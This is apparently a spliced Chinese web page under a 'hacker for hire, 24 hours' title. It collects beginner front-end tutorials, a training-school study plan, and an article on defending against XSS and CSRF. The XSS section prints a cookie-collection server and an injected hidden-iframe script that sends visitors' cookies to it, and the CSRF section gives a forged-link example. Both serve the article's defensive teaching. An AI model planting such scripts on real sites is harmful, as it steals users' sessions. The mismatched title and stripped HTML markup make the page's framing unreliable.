黑客24小时在线接单网站

本文目录一览：

• 1、常见Web前端技术之间的关系，你了解多少
• 2、web前端开发需要学习什么知识？
• 3、web前端需要掌握的哪些知识
• 4、前端安全方面有没有了解？xss和csrf如何攻防
• 5、web前端开发面临的挑战主要是有哪些？
• 6、如何解决繁琐的WEB前端的XSS问题

常见Web前端技术之间的关系，你了解多少

如果你是一个Web开发初学者，那么你难免会在网上搜索HTML, CSS, XML, JS(Javascript), DOM, XSL等等这些词的意思，然而，随着学习的深入。当你把他们搅在一起，你又糊涂了，你会不停的问，HTML是什么?CSS是什么?XML是什么?JS是什么?它们到底有什么用?无论是网络百科，还是一些IT专题网站，又或者一些牛人博客，他们都会告诉你，某个单一的东西是什么，这类文章很多，但很少有涉及，它们组合起来是什么，有什么用。我想，我写这篇文章，就是为了说明一下这个他们很少涉及的问题。

归纳、总结、提炼能力是我们进步的发动机，这种能力是可以有意识地培养的，拉卡拉电子支付公司董事长兼总裁孙陶然提到：在拉卡拉我们要求用三条说清楚任何问题就是一种能力训练，任何问题如果不能用三条说清楚说明你还没想透。

在这里，我争取用最根本的语言向大家分别说明HTML, CSS, XML, JS到底是什么，有什么用。然后我们再来看把他们组合起来是什么，有什么用。当然如果你对HTML, CSS, XML, JS有足够了解，可以直接跳过，看文章的后半部分，那里才是本文核心所在。

第一部分

1. HTML超文本标记语言 (Hyper Text Markup Language) ，是用来描述网页的一种标记语言。

html

head

titleHTML/title

/head

body

p id="num1"Hello World! I'm HTML/p

/body  /html  12345678

网页文件本身是一种文本文件，通过在文本文件中添加标记，可以告诉浏览器如何显示其中的内容(如：文字如何处理，画面如何安排，图片如何显示等)。

HTML之所以称为超文本标记语言，是因为文本中包含了所谓“超链接”点。超文本(Hypertext)是用超链接的方法，将各种不同空间的文字信息组织在一起的网状文本。

概括，HTML就是整合网页结构和内容显示的一种语言。

Hello World! I'm HTML1

浏览器按顺序阅读网页文件，然后根据标记符解释和显示其标记的内容。

这段内容在浏览器上显示的结果是：Hello World! I’m HTML

我们看

标签上有一个id，这是

这个标签的唯一标识，方便别人找到它，对它进行操作。 

2. CSS 层叠样式表单(Cascading StyleSheet)。是将样式信息与网页内容分离的一种标记性语言 。作为网站开发者，你能够为每个HTML元素定义样式，并将之应用于你希望的任意多的页面中。如需进行全局的更新，只需简单地改变样式，然后网站中的所有元素均会自动地更新。这样，即设计人员能够将更多的时间用在设计方面，而不是费力克服HTML的限制。说白了，CSS就是设置网页上HTML元素属性的语言。

CSS代码：

#hello{  

color:blue;  

} 123

当把这段CSS代码应用于HTML中，它会找到id为“hello”的HTML标签，将其中的内容以蓝色显示出来;具体的插入HTML的方法这里不再赘述(说一句，只说明是什么，有什么用的问题，不关注技术细节，技术细节网上很好找)。 

3. Javascript，首先说明JavaScript和Java无关，JavaScript 是属于网络的脚本语言!那么为什么名字如此相似?这是典型的市场营销方面的成功，它的推广成功,也是借了Java的东风。当微软开始意识到Javascript在Web开发人员中流行起来时，微软还是一贯风格，建立了自己的脚本语言，JScript。

Javascript是一种基于对象(Object)和事件驱动(Event Driven)并具有安全性能的脚本语言。使用它的目的是与HTML超文本标记语言、Java脚本语言(Java小程序)一起实现在一个Web页面中链接多个对象，与Web客户交互作用。例如可以设置鼠标悬停效果，在客户端验证表单，创建定制的HTML页面，显示警告框，设置cookie等等。

网页中所有的对数据进行判断、操作以及向浏览者反馈信息的本地代码实现部分均是Javascript(当然也有其他的)，这样既可以使网页更具交互性，给用户提供更令人兴奋的体验，同时减轻了服务器负担。

JS的代码如下：

function jsHello(){

alert('Hello World！');    

}123

当把以上代码应用于HTML代码，它会在你的HTML载入时，弹出一个内容为“Hello World!”的对话框。同样，它是通过嵌入或调入在标准的HTML语言中实现的，至于如何嵌入或调入不再赘述，理由上面提到了。 

4. Xml可扩展标记语言 (Extensible MarkupLanguage)，是一套定义语义标记的规则，这些标记将文档分成许多部件并对这些部件加以标识。它也是元标记语言，即定义了用于定义其他与特定领域有关的、语义的、结构化的标记语言的句法语言。你可以把XML理解为一种数据库，例如rss就是xml的一种变体。

XML代码如下：

Hello  bcdChina/bcd  bcdUSA/bcd  bcdUK/bcd  /Hello  12345

XML的起因是，用户受到SGML(后面再说)复杂性的挫伤和HTML的不充分。相对HTML来说，XML更追求严谨性，如果说你在HTML代码中标签比较混乱，如未关闭等，或许浏览器会忽略这些错误;但同样的事情发生在XML中会给你带来大麻烦。

铺垫终于完了，在进入正题之前，建议大家对比着图来理解后边的内容，废话不多说，开始进入正题。

第二部分

这里的DOM指的是HTML DOM。HTML DOM是W3C的标准，同时它也是HTML的文档对象模型的缩写(the Document Object Model for HTML)。HTML DOM定义了用于HTML的一系列标准的对象，以及访问和处理HTML文档的标准方法。通过DOM，可以访问所有的HTML元素，连同它们所包含的文本和属性。其中的内容可以修改和删除，同时也可以创建新的元素。HTML DOM独立于平台和编程语言。它可被任何编程语言诸如Java、Javascript和VBScript所使用。HTML DOM就是HTML语言对外界开通的接口，以便其他语言能够访问或修改HTML内部的元素。

当js需要对html元素进行操作时，DOM是一个很必要的对象。

你便可以通过利用DOM对象构造如下代码并插入到HTML代码中的任何位置来实现。

script  window.onload=function hello(){

document.getElementById("hello").innerHTML="Hello China!";  

}  

/script12345

当用CSS去修饰HTML中的元素，这一过程可以称为声明HTML元素样式的过程。 

SGML标准通用标记语言(standardgeneralized markup language)。由于SGML的复杂，导致难以普及。SGML有非常强大的适应性，也正是因为同样的原因，导致在小型的应用中难以普及。HTML 和 XML同样衍生于SGML：XML可以被认为是SGML的一个子集，而HTML是SGML的一个应用。XML的产生就是为了简化SGML，以便用于更加通用的目的。比如语义Web，它已经应用于大量的场合，比较著名的有XHTML、RSS 、XML-RPC 和SOAP 。

XHTML是可扩展超文本标识语言(TheExtensible HyperText MarkupLanguage)。HTML是一种基本的Web网页设计语言，XHTML是一个基于XML的置标语言，看起来与HTML有些相象，只有一些小的但重要的区别，XHTML就是一个扮演着类似HTML的角色的XML，所以，本质上说，XHTML是一个过渡技术，结合了部分XML的强大功能及大多数HTML的简单特性。

简单的说，XHTML比HTML要严谨些，但又没像XML那么严重——譬如所有的XHTML标签以及属性必须要小写，属性性必须要加双引号(当然如今的浏览器不管是IE还是FF，对HTML和XHTML采取兼容措施，这也是XSS产生的根本原因)，而且也可以像XML一样自定义部分标签，因此有了极大的灵活性。

而且进入了XHTML时代，大家倡导的是CSS+DIV，这也是web2.0的基础。

DHTML只是一种制作网页的概念，实际上没有一个组织或机构推出过所谓的DHTML标准或技术规范之类的。DHTML不是一种技术、标准或规范，DHTML只是一种将目前已有的网页技术、语言标准整和运用，制作出能在下载后仍然能实时变换页面元素效果的网页的设计概念。DHTML就是动态的html，Dynamic HTML。传统的html页面是静态的，Dhtml就是在html页面上加入了javascript脚本，使其能根据用户的动作作出一定的响应，如鼠标移动到图片上，图片改变颜色，移动到导航栏，弹出一个动态菜单等等。

一般如： 

Expression是微软为了使样式表能够在修饰HTML样式的同时执行javascript脚本而在IE浏览器中增加的一个功能，这样你可以做譬如：图片的自适应宽度，表格的隔行换色等等。

如：img{max-width:500px;width:expression(document.body.clientWidth 200 ? “200px”: “auto”);} 

XMLHTTP最通用的定义为：XmlHttp是一套可以在Javascript、VbScript、Jscript等脚本语言中通过http协议传送或从接收XML及其他数据的一套API。XmlHttp最大的用处是可以更新网页的部分内容而不需要刷新整个页面。

来自MSDN的解释：XmlHttp提供客户端同http服务器通讯的协议。客户端可以通过XmlHttp对象向http服务器发送请求并使用微软XML文档对象模型Microsoft® XML Document Object Model (DOM)处理回应。

现在的绝对多数浏览器都增加了对XmlHttp的支持，IE中使用ActiveXObject方式创建XmlHttp对象，其他浏览器如：Firefox、Opera等通过window.XMLHttpRequest来创建XmlHttp对象。

一个简单的定义IE的XmlHttp的对象及应用的实例如下：

var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");  

XmlHttp.Open("get","url",true);  

XmlHttp.send(null);  

XmlHttp.onreadystatechange=function ServerProcess(){

if (XmlHttp.readystate==4 || XmlHttp.readystate=='complete')

{

alert(XmlHttp.responseText);

}  

}  123456789

XSLT(eXtensibleStylesheet LanguageTransformation)最早设计XSLT的用意是帮助XML文档(document)转换为其它文档。但是随着发展，XSLT已不仅仅用于将XML转换为HTML或其它文本格式，更全面的定义应该是：XSLT是一种用来转换XML文档结构的语言。

XSL-FO：XSL在转换XML文档时分为明显的两个过程，第一转换文档结构;其次将文档格式化输出。这两步可以分离开来并单独处理，因此XSL在发展过程中逐渐分裂为XSLT(结构转换)和XSL-FO(formattingobjects)(格式化输出)两种分支语言，其中XSL-FO的作用就类似CSS在HTML中的作用。 

AJAX：异步JavaScript和XML(AsynchronousJavaScript and XML)。

最后一个东东，它算得上是web2.0思想的心。AJAX=CSS+HTML+JS+XML+DOM+XSLT+XMLHTTP。是指一种创建交互式网页应用的网页开发技术。AJAX不是一种单一的新技术，而是有机地利用了一系列相关的技术。

在 2005年，Google 通过其 Google Suggest 使 AJAX 变得流行起来。

Google Suggest 使用 AJAX 创造出动态性极强的 web 界面：当您在谷歌的搜索框输入关键字时，Javascript会把这些字符发送到服务器，然后服务器会返回一个搜索建议的列表。

在AJAX中，XmlHttp用来在不改变页面的情况下传输数据，其中传输的数据即是XML，然后通过XSLT将其格式化，利用js通过dom对象将其显示到HTML中，同时利用CSS确定数据的显示及位置。

这项技术在网络上的应用无处不在，如你的微博，你的邮箱，你的QQ空间，再如搜索引擎，电子商务平台，网络地图等等

web前端开发需要学习什么知识？

最近不少小伙伴都会留言问，零基础学习前端需要了解哪些知识，小白学习Web前端开发容易吗？针对大家的疑问，下面，尚学堂前端学院给大家介绍一下。

首先，先给大家介绍一下前端工程师到底是做什么的。

他们主要的工作是把UI的设计图按照w3c标准做成html页面，并且用javascript脚本语言实现页面上的前端互动。互动效果包括，弹出层，页签切换，图片滚动，ajax异步互动。

高级前端工程师还要承担前端优化的工作，优化的知识就会更多一些，比如文件过期Expires，缓存，异步缓存，js和css以及图片的压缩等。

前端开发是一项很特殊的工作，前端工程师的工作说的轻送，看似轻巧，但做起来绝对不是那么的简单。在开发过程中涵盖的东西非常宽广，既要从技术的角度来思考页面的实现，规避技术的死角，又要从用户的角度来思考，怎样才能更好地接受技术呈现的枯燥的数据，更好地呈现信息。简单地说，它的主要职能就将网站的数据和用户的接受更好地结合在一起，为用户呈现一个友好的数据界面。

前端工程师是一个很新的职业，在国内乃至国际上真正开始受到重视的时间不超过5年。互联网的发展速度迅猛，网页WEB1.0到WEB2.0，再到新生的HTML5、CSS3，到现在手机、3G网络等新科技的兴起，网页也由最原先的图文为主，到现在各种各样的基于衰前端技术实现的应用、交互和富媒体的呈现，更多的信息，更丰富的内容、更友好的体验，已经成为网站前端开发的要求，网站的前端开发发生了翻天覆地的变化。网站的开发对前端的需要越来越重要，但目前前端工程师的需要越来越重要，但目前前端工程师需求大于供给，前端人才非常紧缺。所以高质量的前端开发工程师将会是后五年内一个非常热门的职业，发展的前景非常可观。

那么，零基础小白学Web前端需要了解哪些知识呢？

如果你是一个刚入门的零基础小白，那你首先肯定要掌握的是前端开发的基础知识，相关的程序语言；HTML、CSS、JauaScript，在页面的布局时，HTML将元素进行定义，CSS对展示的元素进行定位，再通过JavaScript实现相应的效果和交互。这些知识都是基础，必须熟练掌握，才能进行流畅的编写。

学程序语言，当然是与工具相辅相成的，学语言的同时，需要掌握的就是开发工具的使用，对于新手来说，初学用到的是几个比较常见的工具：

1，Dreamweaver：，集网页制作和管理网站于一身的所见即所得网页代码编辑器。

2，Sublime，全称Sublime Text ，是一个主要功能包括拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口的代码编辑器

3，HBuilder：是DCloud,推出的一款支持HTML5的Web开发IDE。

熟悉这些工具之后，你一定对基础的开发工作有一定的了解了，这时候要提升自己的能力，就可以学习更多工具的使用，比如Bootstrap能给你的Web开发提供了更时尚的版式，表单，buttons，表格，网络系统等。Secureheaders能够自动实施安全相关的header规则，防止XSS、HSTS等攻击

前端开发之路不是一成不变的，可能会根据时代的发展，软件的更新，学的内容也有所变化，不过，打好基础，无论学习哪方面的知识，都得心应手。

简单的了解之后呢，就是重头戏了!

前端小白如何学习web前端呢？

前端自学者存在的学习误区：

所学东西可能已过时

奉为经典的的东西已经过时，或者已经有了更好的替代者，而你获取信息的渠道有限，消息滞后，导致学习内容也相对滞后。

2.学习方法盲目

看书看不懂就找视频类教程学习，觉得教程跟自己的口味不符就另寻他法，因为自己缺少对资源的辨识能力，总是在没有清晰规划学习路线的的情况下就盲目学习，导致无效学习时间过长而收获寥寥。

3、只有理论，缺乏真实项目锻炼

对技术的理解停留在理论层次，而缺乏真实企业项目的历练，如果没有相关实习或工作经历，对前端岗位具体的责任划分和工作流程了解不充分。

如何自学前端知识：

自学方法：

作为一个初学者，你必须明确系统的学习方案，我建议一定有一个指导的人，全靠自己学，放弃的几率非常大，在你对于web前端还没有任何概念的时候，需要一个人领进门，之后就都靠自己钻研，第一步就是确定web前端都需要哪些内容，并且在多少时间内学完，建议时间6个月保底。

2.视频为主，书为辅。很多初学者在学习前端的时候非常喜欢去买书，但是最后的结果是什么？看来看去什么都不会写，所以在这里给大家提醒，书可以看，但是是建立与你已经对某个知识点有了具体操作的执行后，在用书去巩固概念，这样更加有利于你对知识的理解。

3.对于学习技术来讲，掌握一个学习方法是非常重要的，其实对于web前端来讲，学习方法确实很多都是相通的，一旦学习方法不对，可能就会造成“方法不对，努力白费”。其实关于这方面还是很多的，我就简单说个例子，有的人边听课边跟着敲代码，这样就不对，听课的时候就专心听，做题的时候就专心做题，这都是过来人的经验，一定要听。根据每个人的不同，可能学习方法也会有所出路，找到适合你自己的学习方法是学习的前提。

4.不建议自己一个人瞎学，在我了解学习编程的这些人来看，从零基础开始学并且最后成功做这份工作的其实并没有几个，我觉得大部分原因就是因为他们都不了解web前端是干什么的，学什么的，就盲目地买书看，到处找视频看，最后看着看着就放弃了，所以我建议初学者在没有具体概念之前，还是找有经验的人请教一下，聊过之后你就会知道web前端具体是干什么的，该怎么学，这是我个人的小建议，可以不采纳。

必读的前端书籍资料：

1、《JavaScript DOM 编程艺术》

超级前端畅销书，作为前端程序员必读两遍以上的书籍，这本书籍特别适合初学前端的新人，前端的核心技术就是JavaScript，同时也是前端的难点。而这本书非常适合入门，通俗易懂，生动的案例可以让初学者更好的进行理解。所提及的很多编程思想却适合低中级层次的前端开发者学习。

2、《JavaScript权威指南》

同样是前端程序员必读的一本书籍，不仅适合初学者，还适合那些已经在做前端工作的程序员进行随时翻阅。里面涵盖了JavaScript的所有内容，以及web浏览器所实现的JavaScript API。对于了解js的基础知识，比如对象，数组，语法，作用域，闭包等等都很有帮助。

3、《JavaScript 高级程序设计》

如果你想把JavaScript非常完全的系统学习一遍，我强烈推荐这本书，这本书可以一直保留，在用这本书的过程中还可以画下重点，以后可以作为参考，是工作中非常强力的帮手。面试的时候也可以很好的应用上，我们俗称的“红宝书”。

4、《你不知道的JavaScript》

这本书不适合前端的初学者，想要深入的了解JavaScript原理，这是每一个前端程序员必须要研究的一本书籍。要让不求甚解的JavaScript开发者迎难而上，深入语言内部，弄清楚JavaScript每一个零部件的用途。如果可以把这本书吃透，那么以后理解任何东西都可以很快的理解和掌握。

5、《Vue.js权威指南》

Vue作为现在前端的主流框架，在国内应用最为广泛，所以了解Vue原理必须要啃一本Vue的书籍。我之所以推荐这本，是因为这本书对于引导初用Vue的开发者有着质的提升。从基础知识到主流打包以及源码解析，还有很多实践的案例，都是一本不错的实用性书籍。主要内容包括数据绑定、指令、表单控件绑定、过滤器、组件、表单验证、服务通信、路由和视图、vue-cli、测试开发和调试、源码解析及主流打包构建工具等。该书内容全面，讲解细致，示例丰富，适用于各层次的开发者。

6、《编程之美》

无论是什么岗位的程序员，必读的一本书籍，没有读过这本书的程序员几乎都是假程序员。这本书有60道算法和程序设计题目，这些题目大部分在近年的笔试，面试中出现过，或者是被微软员工热烈讨论过。作者试图从书中各种有趣的问题出发，引导读者发现问题，分析问题，解决问题，寻找更优的解法。可以大幅度提高自己的编程思维和对于这个行业的深入思考，最终变成技术大牛。

学习路线：

第1阶段：前端页面重构(4周)

内容包含了：(PC端网站布局项目、HTML5+CSS3基础项目、WebApp页面布局项目)

第2阶段：JavaScript高级程序设计(5周)

内容包含：(原生JavaScript交互功能开发项目、面向对象进阶与ES5/ES6应用项目、JavaScript工具库自主研发项目)

第3阶段：PC端全栈项目开发(3周)

内容包含：(jQuery经典交互特效开发、HTTP协议、Ajax进阶与PHP/JAVA开发项目、前端工程化与模块化应用项目、PC端网站开发项目、PC端管理信息系统前端开发项目)

第4阶段：移动端项目开发(6周)

内容包含：(Touch端项目、微信场景项目、应用Angular+Ionic开发WebApp项目、应用Vue.js开发WebApp项目、应用React.js开发WebApp项目)

第5阶段：混合(Hybrid,ReactNative)开发(1周)

内容包含：(微信小程序开发、ReactNative、各类混合应用开发)

第6阶段：NodeJS全栈开发(1周)

内容包括：(WebApp后端系统开发、一、NodeJS基础与NodeJS核心模块二、Express三、noSQL数据库)

视频教程：

以上就是尚学堂前端学院为您简单介绍的关于web前端小白的学习路程。

总的来说，零基础小白学习Web前端除了要了解整个前端行业的动态及发展外，还应该学习HTML、CSS、JavaScript等知识，是一个庞大而复杂的技术体系。

如果你对于学习前端技术感兴趣，想学一门新技术，我给你提供一个非常不错的前端学习交流qun：一一四一八八四九三一。有问题就在里面问我，这样你可以少走很多弯路，做起来有效率，记得多跟有经验的人交流，别闭门造车。如果没有比较好的教程，也可以管我要。

本文由尚学堂前端学院原创，欢迎关注，带你一起学习Web前端知识！

web前端需要掌握的哪些知识

一个合格的web前端需要掌握哪些技术？

最基础的自然是JavaScript，HTML和css这三种语言。

首先了解下它们到底是什么。

HTML是用户看到的网页的骨架，比如你会发现当前页面分为左中右三个部分，其中还填充了不同的文字和图片；每个子部分还会继续细分，比如当前页面的中间部分下方有输入框等等。

CSS是网页展示的细节控制，比如你会发现有的文字是红底白色，有的子部分占了页面的二分之一宽，有的只占六分之一，有些部分需要用户进行某些操作（如点击，滑动）才会出现等等，这些就是有CSS来控制。

JavaScript是负责捕捉用户在浏览器上的操作，并与后端服务器进行数据交换的脚本语言。当用户在前端进行点击，输入等操作的时候，会触动绑定了该动作的JavaScript脚本，然后JavaScript收集数据，调用后端的api接口，再将后端返回的数据交给HTML和CSS渲染出来。

一个网页的HTML代码和CSS代码是可以直接在浏览器中查看的，你可以直接按F12，就能看到下图右侧的模块，左右侧红框就是代码与实际页面的对应关系。因此如果你看到某个网站的布局很不错，不妨点击F12，进行学习。

前端框架

然而，实际应用中，已经很少有正规的项目组直接用上述三种语言进行web 前端开发了，而是使用很多封装了这三种语言的框架，比如

Vue.js

，angular，react native等等。它们是来自谷歌和Facebook的大神项目组，基于自己的经验，封装了原生前端语言，实现了更多更复杂更酷炫的功能。因此，可以说，学会使用这些框架，能达到事半功倍的效果。

比如用了vue，它是自底向上增量开发的设计，其核心只关心图层，而且还可以与其他库或已存项目融合，学习门槛极其友好；另一方面，vue可以驱动单文件组件和vue生态系统支持的库开发的复杂单页应用。有了这个生态系统，可以说，vue是处在一个不断壮大，不断完善的欣欣向荣的状态。

网络通信协议

由于前后端分离的趋势，前端还需要了解很多网络通信协议的知识，这里不局限于http协议，因为据我的经验，有时候我们还会用到websocket等协议。因此，前端需要简单了解不同协议的特点以及使用方式，但是好消息是不用像学习计算机网络课程一样对每种协议的原理都了解的特别透彻，只要学会如何用前端语言发送这种协议的请求就够了。

前端安全方面有没有了解？xss和csrf如何攻防

在那个年代，大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用，于是 SQL 注入成了很流行的攻击方式。在这个年代， 参数化查询 已经成了普遍用法，我们已经离 SQL 注入很远了。但是，历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了，所以我对用户输入的数据一直非常小心。如果输入的时候没有经过 Tidy 之类的过滤，我一定会在模板输出时候全部转义。所以个人感觉，要避免 XSS 也是很容易的，重点是要“小心”。但最近又听说了另一种跨站攻击 CSRF ，于是找了些资料了解了一下，并与 XSS 放在一起做个比较。

XSS：脚本中的不速之客

XSS 全称“跨站脚本”，是注入攻击的一种。其特点是不对服务器端造成任何伤害，而是通过一些正常的站内交互途径，例如发布评论，提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本，作为内容发布到了页面上，其他用户访问这个页面的时候就会运行这些脚本。

运行预期之外的脚本带来的后果有很多中，可能只是简单的恶作剧——一个关不掉的窗口：

1

2

3

while (true) {

alert("你关不掉我~");

}

也可以是盗号或者其他未授权的操作——我们来模拟一下这个过程，先建立一个用来收集信息的服务器：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

#!/usr/bin/env python

#-*- coding:utf-8 -*-

"""

跨站脚本注入的信息收集服务器

"""

import bottle

app = bottle.Bottle()

plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')

app.install(plugin)

@app.route('/myxss/')

def show(cookies, db):

SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'

try:

db.execute(SQL, cookies)

except:

pass

return ""

if __name__ == "__main__":

app.run()

然后在某一个页面的评论中注入这段代码：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

// 用 script type="text/javascript"/script 包起来放在评论中

(function(window, document) {

// 构造泄露信息用的 URL

var cookies = document.cookie;

var xssURIBase = "";

var xssURI = xssURIBase + window.encodeURI(cookies);

// 建立隐藏 iframe 用于通讯

var hideFrame = document.createElement("iframe");

hideFrame.height = 0;

hideFrame.width = 0;

hideFrame.style.display = "none";

hideFrame.src = xssURI;

// 开工

document.body.appendChild(hideFrame);

})(window, document);

于是每个访问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求，是他们所看不到的。而这个请求，会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。

我们知道 AJAX 技术所使用的 XMLHttpRequest 对象都被浏览器做了限制，只能访问当前域名下的 URL，所谓不能“跨域”问题。这种做法的初衷也是防范 XSS，多多少少都起了一些作用，但不是总是有用，正如上面的注入代码，用 iframe 也一样可以达到相同的目的。甚至在愿意的情况下，我还能用 iframe 发起 POST 请求。当然，现在一些浏览器能够很智能地分析出部分 XSS 并予以拦截，例如新版的 Firefox、Chrome 都能这么做。但拦截不总是能成功，何况这个世界上还有大量根本不知道什么是浏览器的用户在用着可怕的 IE6。从原则上将，我们也不应该把事关安全性的责任推脱给浏览器，所以防止 XSS 的根本之道还是过滤用户输入。用户输入总是不可信任的，这点对于 Web 开发者应该是常识。

正如上文所说，如果我们不需要用户输入 HTML 而只想让他们输入纯文本，那么把所有用户输入进行 HTML 转义输出是个不错的做法。似乎很多 Web 开发框架、模版引擎的开发者也发现了这一点，Django 内置模版和 Jinja2 模版总是默认转义输出变量的。如果没有使用它们，我们自己也可以这么做。PHP 可以用 htmlspecialchars 函数，Python 可以导入 cgi 模块用其中的 cgi.escape 函数。如果使用了某款模版引擎，那么其必自带了方便快捷的转义方式。

真正麻烦的是，在一些场合我们要允许用户输入 HTML，又要过滤其中的脚本。Tidy 等 HTML 清理库可以帮忙，但前提是我们小心地使用。仅仅粗暴地去掉 script 标签是没有用的，任何一个合法 HTML 标签都可以添加 onclick 一类的事件属性来执行 JavaScript。对于复杂的情况，我个人更倾向于使用简单的方法处理，简单的方法就是白名单重新整理。用户输入的 HTML 可能拥有很复杂的结构，但我们并不将这些数据直接存入数据库，而是使用 HTML 解析库遍历节点，获取其中数据（之所以不使用 XML 解析库是因为 HTML 要求有较强的容错性）。然后根据用户原有的标签属性，重新构建 HTML 元素树。构建的过程中，所有的标签、属性都只从白名单中拿取。这样可以确保万无一失——如果用户的某种复杂输入不能为解析器所识别（前面说了 HTML 不同于 XML，要求有很强的容错性），那么它不会成为漏网之鱼，因为白名单重新整理的策略会直接丢弃掉这些未能识别的部分。最后获得的新 HTML 元素树，我们可以拍胸脯保证——所有的标签、属性都来自白名单，一定不会遗漏。

现在看来，大多数 Web 开发者都了解 XSS 并知道如何防范，往往大型的 XSS 攻击（包括前段时间新浪微博的 XSS 注入）都是由于疏漏。我个人建议在使用模版引擎的 Web 项目中，开启（或不要关闭）类似 Django Template、Jinja2 中“默认转义”（Auto Escape）的功能。在不需要转义的场合，我们可以用类似 的方式取消转义。这种白名单式的做法，有助于降低我们由于疏漏留下 XSS 漏洞的风险。

另外一个风险集中区域，是富 AJAX 类应用（例如豆瓣网的阿尔法城）。这类应用的风险并不集中在 HTTP 的静态响应内容，所以不是开启模版自动转义能就能一劳永逸的。再加上这类应用往往需要跨域，开发者不得不自己打开危险的大门。这种情况下，站点的安全非常 依赖开发者的细心和应用上线前有效的测试。现在亦有不少开源的 XSS 漏洞测试软件包（似乎有篇文章提到豆瓣网的开发也使用自动化 XSS 测试），但我都没试用过，故不予评价。不管怎么说，我认为从用户输入的地方把好关总是成本最低而又最有效的做法。

CSRF：冒充用户之手

起初我一直弄不清楚 CSRF 究竟和 XSS 有什么区别，后来才明白 CSRF 和 XSS 根本是两个不同维度上的分类。XSS 是实现 CSRF 的诸多途径中的一条，但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。

CSRF 的全称是“跨站请求伪造”，而 XSS 的全称是“跨站脚本”。看起来有点相似，它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户，但前面说了，它们的攻击类型是不同维度上的分 类。CSRF 顾名思义，是伪造请求，冒充用户在站内的正常操作。我们知道，绝大多数网站是通过 cookie 等方式辨识用户身份（包括使用服务器端 Session 的网站，因为 Session ID 也是大多保存在 cookie 里面的），再予以授权的。所以要伪造用户的正常操作，最好的方法是通过 XSS 或链接欺骗等途径，让用户在本机（即拥有身份 cookie 的浏览器端）发起用户所不知道的请求。

严格意义上来说，CSRF 不能分类为注入攻击，因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌，但对于设计不佳的网站，一条正常的链接都能造成 CSRF。

例如，一论坛网站的发贴是通过 GET 请求访问，点击发贴之后 JS 把发贴内容拼接成目标 URL 并访问：

标题content=内容

那么，我只需要在论坛中发一帖，包含一链接：

我是脑残content=哈哈

只要有用户点击了这个链接，那么他们的帐户就会在不知情的情况下发布了这一帖子。可能这只是个恶作剧，但是既然发贴的请求可以伪造，那么删帖、转帐、改密码、发邮件全都可以伪造。

如何解决这个问题，我们是否可以效仿上文应对 XSS 的做法呢？过滤用户输入， 不允许发布这种含有站内操作 URL 的链接。这么做可能会有点用，但阻挡不了 CSRF，因为攻击者可以通过 QQ 或其他网站把这个链接发布上去，为了伪装可能还使用 bit.ly 压缩一下网址，这样点击到这个链接的用户还是一样会中招。所以对待 CSRF ，我们的视角需要和对待 XSS 有所区别。CSRF 并不一定要有站内的输入，因为它并不属于注入攻击，而是请求伪造。被伪造的请求可以是任何来源，而非一定是站内。所以我们唯有一条路可行，就是过滤请求的 处理者。

比较头痛的是，因为请求可以从任何一方发起，而发起请求的方式多种多样，可以通过 iframe、ajax（这个不能跨域，得先 XSS）、Flash 内部发起请求（总是个大隐患）。由于几乎没有彻底杜绝 CSRF 的方式，我们一般的做法，是以各种方式提高攻击的门槛。

首先可以提高的一个门槛，就是改良站内 API 的设计。对于发布帖子这一类创建资源的操作，应该只接受 POST 请求，而 GET 请求应该只浏览而不改变服务器端资源。当然，最理想的做法是使用 REST 风格 的 API 设计，GET、POST、PUT、DELETE 四种请求方法对应资源的读取、创建、修改、删除。现在的浏览器基本不支持在表单中使用 PUT 和 DELETE 请求方法，我们可以使用 ajax 提交请求（例如通过 jquery-form 插件，我最喜欢的做法），也可以使用隐藏域指定请求方法，然后用 POST 模拟 PUT 和 DELETE （Ruby on Rails 的做法）。这么一来，不同的资源操作区分的非常清楚，我们把问题域缩小到了非 GET 类型的请求上——攻击者已经不可能通过发布链接来伪造请求了，但他们仍可以发布表单，或者在其他站点上使用我们肉眼不可见的表单，在后台用 js 操作，伪造请求。

接下来我们就可以用比较简单也比较有效的方法来防御 CSRF，这个方法就是“请求令牌”。读过《J2EE 核心模式》的同学应该对“同步令牌”应该不会陌生，“请求令牌”和“同步令牌”原理是一样的，只不过目的不同，后者是为了解决 POST 请求重复提交问题，前者是为了保证收到的请求一定来自预期的页面。实现方法非常简单，首先服务器端要以某种策略生成随机字符串，作为令牌（token）， 保存在 Session 里。然后在发出请求的页面，把该令牌以隐藏域一类的形式，与其他信息一并发出。在接收请求的页面，把接收到的信息中的令牌与 Session 中的令牌比较，只有一致的时候才处理请求，否则返回 HTTP 403 拒绝请求或者要求用户重新登陆验证身份。

请求令牌虽然使用起来简单，但并非不可破解，使用不当会增加安全隐患。使用请求令牌来防止 CSRF 有以下几点要注意：

虽然请求令牌原理和验证码有相似之处，但不应该像验证码一样，全局使用一个 Session Key。因为请求令牌的方法在理论上是可破解的，破解方式是解析来源页面的文本，获取令牌内容。如果全局使用一个 Session Key，那么危险系数会上升。原则上来说，每个页面的请求令牌都应该放在独立的 Session Key 中。我们在设计服务器端的时候，可以稍加封装，编写一个令牌工具包，将页面的标识作为 Session 中保存令牌的键。

在 ajax 技术应用较多的场合，因为很有请求是 JavaScript 发起的，使用静态的模版输出令牌值或多或少有些不方便。但无论如何，请不要提供直接获取令牌值的 API。这么做无疑是锁上了大门，却又把钥匙放在门口，让我们的请求令牌退化为同步令牌。

第一点说了请求令牌理论上是可破解的，所以非常重要的场合，应该考虑使用验证码（令牌的一种升级，目前来看破解难度极大），或者要求用户再次输入密码（亚马逊、淘宝的做法）。但这两种方式用户体验都不好，所以需要产品开发者权衡。

